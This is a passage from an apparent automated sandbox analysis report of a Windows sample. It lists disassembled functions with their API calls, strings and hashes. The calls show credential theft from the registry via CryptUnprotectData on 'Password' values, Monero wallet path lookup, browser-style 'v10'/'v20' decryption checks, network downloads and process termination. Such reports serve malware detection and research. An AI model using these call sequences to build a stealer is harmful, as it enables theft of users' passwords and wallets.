                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$AttributesFile
                            • String ID:
                            • API String ID: 3428472996-0
                            • Opcode ID: 92c3c8da89a83b1892112511c4da36c6fca156efcc359eebdea5c65febcdd1ec
                            • Instruction ID: 0ffdaf8f05d24d15a79b0f1981713b448bf6f8e09a34f84087c0228a131154ba
                            • Opcode Fuzzy Hash: 92c3c8da89a83b1892112511c4da36c6fca156efcc359eebdea5c65febcdd1ec
                            • Instruction Fuzzy Hash: 0441C271D1011C9BDB21EB64DD44ADE73B9BF48304F0059AAF90A93251DBB89F858F94
                            Function 00437A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004377D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00437805
                              • Part of subcall function 004377D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0043784A
                              • Part of subcall function 004377D0: StrStrA.SHLWAPI(?,Password), ref: 004378B8
                              • Part of subcall function 004377D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004378EC
                              • Part of subcall function 004377D0: HeapFree.KERNEL32(00000000), ref: 004378F3
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 00437A90
                            • lstrcat.KERNEL32(00000000,?), ref: 00437ABD
                            • lstrcat.KERNEL32(00000000, : ), ref: 00437ACF
                            • lstrcat.KERNEL32(00000000,?), ref: 00437AF0
                            • wsprintfA.USER32 ref: 00437B10
                            • lstrcpy.KERNEL32(00000000,?), ref: 00437B39
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00437B47
                            • lstrcat.KERNEL32(00000000,00464AD4), ref: 00437B60
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                            • String ID: :
                            • API String ID: 398153587-3653984579
                            • Opcode ID: 00a92a618e6350c8d2c195fcb80c80c89e7e9a6fb3c4a023c43dbb4e354ac1c8
                            • Instruction ID: ea9398c398933ef07e3fb0a5b202859c756ac4b728fb2650e03a341622b71ffc
                            • Opcode Fuzzy Hash: 00a92a618e6350c8d2c195fcb80c80c89e7e9a6fb3c4a023c43dbb4e354ac1c8
                            • Instruction Fuzzy Hash: 4A31A9B2A04214AFCF20DBA4DC4496FB77AFB88704F24651FEA4593300DBB9E941CB65
                            Function 004481B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 0044820C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448243
                            • lstrlen.KERNEL32(00000000), ref: 00448260
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448297
                            • lstrlen.KERNEL32(00000000), ref: 004482B4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004482EB
                            • lstrlen.KERNEL32(00000000), ref: 00448308
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448337
                            • lstrlen.KERNEL32(00000000), ref: 00448351
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00448380
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 67571de08413ab8b8d83c3da2a6be880889d2e5366a50ad96aab7c145d942c3f
                            • Instruction ID: b81198f8b90b83f8666b30b969ada1db92bef62a68dd47b9f03513b955a7bb57
                            • Opcode Fuzzy Hash: 67571de08413ab8b8d83c3da2a6be880889d2e5366a50ad96aab7c145d942c3f
                            • Instruction Fuzzy Hash: BA517B71A006029BEB10EF39D958A6FB7A8EF44740F11451AED06DB344EB79ED50CBE4
                            Function 004377D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00437805
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0043784A
                            • StrStrA.SHLWAPI(?,Password), ref: 004378B8
                              • Part of subcall function 00437750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0043775E
                              • Part of subcall function 00437750: RtlAllocateHeap.NTDLL(00000000), ref: 00437765
                              • Part of subcall function 00437750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0043778D
                              • Part of subcall function 00437750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004377AD
                              • Part of subcall function 00437750: LocalFree.KERNEL32(?), ref: 004377B7
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004378EC
                            • HeapFree.KERNEL32(00000000), ref: 004378F3
                            • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00437A35
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                            • String ID: Password
                            • API String ID: 356768136-3434357891
                            • Opcode ID: a193693a291b6810df8708b1763eba02b8251df906962ea25eaa5ad3b5e6e629
                            • Instruction ID: b73b9ad4ab2fcad9d7f029d5a15f9a10285b6b52bfb50efdc1d8a3604448a900
                            • Opcode Fuzzy Hash: a193693a291b6810df8708b1763eba02b8251df906962ea25eaa5ad3b5e6e629
                            • Instruction Fuzzy Hash: 497151B1D0021DAFDB10DF95CC80ADEBBB9EF49300F1055AAE509A7240EB755A85CFA5
                            Function 00431120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00431135
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0043113C
                            • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00431159
                            • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00431173
                            • RegCloseKey.ADVAPI32(?), ref: 0043117D
                            Strings
                            • SOFTWARE\monero-project\monero-core, xrefs: 0043114F
                            • wallet_path, xrefs: 0043116D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                            • API String ID: 3225020163-4244082812
                            • Opcode ID: 5cd21aa1884b0edcc3b49cf03bd937ae028bdd0a9c091f0fdcb48e5daed24c74
                            • Instruction ID: f35857a8eaa5f45fa601de5f38a7ac08f467b7aaec3feb504cf7c1cd575aa97e
                            • Opcode Fuzzy Hash: 5cd21aa1884b0edcc3b49cf03bd937ae028bdd0a9c091f0fdcb48e5daed24c74
                            • Instruction Fuzzy Hash: 81F03075640308BFDB109BE09D4DFEB7B7DEB04756F100155FE05E2290EAF45A4497A1
                            Function 00439DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                            Download Yara Rule
                            APIs
                            • memcmp.MSVCRT(?,v20,00000003), ref: 00439E04
                            • memcmp.MSVCRT(?,v10,00000003), ref: 00439E42
                            • LocalAlloc.KERNEL32(00000040), ref: 00439EA7
                              • Part of subcall function 004571E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004571FE
                            • lstrcpy.KERNEL32(00000000,00464C48), ref: 00439FB2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpymemcmp$AllocLocal
                            • String ID: @$v10$v20
                            • API String ID: 102826412-278772428
                            • Opcode ID: f38887ccfaa518c4a0b89165d9b2330fdc039b104899f706754542eee58db585
                            • Instruction ID: fe2071b43d760e97dc94714ef43d8a2134b0535ecfe804e8aa56756f81ea48ef
                            • Opcode Fuzzy Hash: f38887ccfaa518c4a0b89165d9b2330fdc039b104899f706754542eee58db585
                            • Instruction Fuzzy Hash: B351B131A103099BDB10EF65DC81B9E77A4EF48318F15602AFD49EB351DBB8ED058B98
                            Function 00435640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0043565A
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00435661
                            • InternetOpenA.WININET(0045CFEC,00000000,00000000,00000000,00000000), ref: 00435677
                            • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00435692
                            • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004356BC
                            • memcpy.MSVCRT(00000000,?,00000001), ref: 004356E1
                            • InternetCloseHandle.WININET(?), ref: 004356FA
                            • InternetCloseHandle.WININET(00000000), ref: 00435701
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                            • String ID:
                            • API String ID: 1008454911-0
                            • Opcode ID: 9d51945bce78a92ad7d2e68c44ced175ae16db793b43a052299a092a1cd3cf87
                            • Instruction ID: 50cf241802207a6c61a1e70ff6dfa3d5b1dce750212e357c191150fe29fb9ed1
                            • Opcode Fuzzy Hash: 9d51945bce78a92ad7d2e68c44ced175ae16db793b43a052299a092a1cd3cf87
                            • Instruction Fuzzy Hash: 2E41A370A00605EFDB24CF54DD88FAAB7B9FF48304F24916AE9089B391D7759941CF98
                            Function 00454740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00454759
                            • Process32First.KERNEL32(00000000,00000128), ref: 00454769
                            • Process32Next.KERNEL32(00000000,00000128), ref: 0045477B
                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0045479C
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004547AB
                            • CloseHandle.KERNEL32(00000000), ref: 004547B2
                            • Process32Next.KERNEL32(00000000,00000128), ref: 004547C0
                            • CloseHandle.KERNEL32(00000000), ref: 004547CB
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                            • String ID:
                            • API String ID: 3836391474-0
                            • Opcode ID: 757b8156209ce7ed14b63749a4ffb0b814b37d5df4a50af20263fb9819fa4a50
                            • Instruction ID: 7badd1c3a26205f5926f4967b30690c7b7aae10ddf7d27e1a7b95a3b56b44739
                            • Opcode Fuzzy Hash: 757b8156209ce7ed14b63749a4ffb0b814b37d5df4a50af20263fb9819fa4a50
                            • Instruction Fuzzy Hash: 4E01F531601214AFE7205B709C88FEB77BDEB88756F001285FD05D6282EFB48DC88A64
                            Function 004483E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00448435
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044846C
                            • lstrlen.KERNEL32(00000000), ref: 004484B2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 004484E9
                            • lstrlen.KERNEL32(00000000), ref: 004484FF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0044852E
                            • StrCmpCA.SHLWAPI(00000000,00464C3C), ref: 0044853E
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: ed1f366fc5159db7f74d3783d81f3af8bf939d8101bcc4fafd67657353fef42f
                            • Instruction ID: 2a6c902bc2ae4ebd2631b939d2910b754dc9315a3988ce74009c3c39074558dd
                            • Opcode Fuzzy Hash: ed1f366fc5159db7f74d3783d81f3af8bf939d8101bcc4fafd67657353fef42f
                            • Instruction Fuzzy Hash: AD519E75A002069FDB20DF28D984A5BB7F9EF58340F24945EEC86EB345EB38E9418B54
                            Function 00452910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00452925
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0045292C
                            • RegOpenKeyExA.ADVAPI32(80000002,00FEB6F0,00000000,00020119,004528A9), ref: 0045294B
                            • RegQueryValueExA.ADVAPI32(004528A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00452965
                            • RegCloseKey.ADVAPI32(004528A9), ref: 0045296F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
